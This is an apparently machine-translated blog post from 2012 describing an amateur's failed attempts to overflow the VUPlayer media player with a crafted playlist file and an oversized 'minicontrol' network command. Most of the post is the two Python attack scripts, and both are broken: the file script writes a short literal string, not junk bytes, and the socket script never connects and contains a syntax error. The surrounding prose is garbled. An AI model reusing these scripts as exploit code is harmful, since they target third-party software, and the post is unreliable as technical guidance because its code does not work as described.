Selasa, 14 Februari 2012

DirectRetrun VUPLAYER

I use a direct return in two types of attacks in which they differ in the pattern of assault in the attack this time is in use is syntak pythonin writing syntak problems occur.


1. attacks by making the music file with a variable in Rev 40000.


 command syntak python,


 #usb/bin/python
file="irwan.pls"
junk="ada"+" 40000"
f=open(file,'w')
f.write(junk)
print ("created successfully")
f.close()









mp3 file has been successfully made​​, and then stayed on the run.

then i tried to run vuplayer and then the resultsdisplay on the desktop to be weird and I do not know it.


awalany normal desktop display in stelah sya that I created a file icon turns into like the one in the picture,, it was caused because I saw vupalyer through OllyDbgand the results just as it is,,,


when I run through OllyDbg results shown above saperti OllyDbgdid breakpoint...


2. Tin the second attack I searched through the mini Error controlI want offerflow in the control

 - run syntak from python,,

#!usb/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41" * 40000000
data=s.recv (192.168.56.24)
print("sendingevildatavia minicontrol command...")
s.send('minicontrol '+buffer+'\r\n')
data=s.recv(1024)
s.send ('minicontrol'+'\r\n')
s.close()
print("Finish")


shown in the picture above buffer was increased to 40000000 and it still can get intooffervlow blum.......


Scribe dijanlankan when the python is the case, and warnings,Error.


syntax error that arises because the address above is the error message,,,

Tidak ada komentar:

Posting Komentar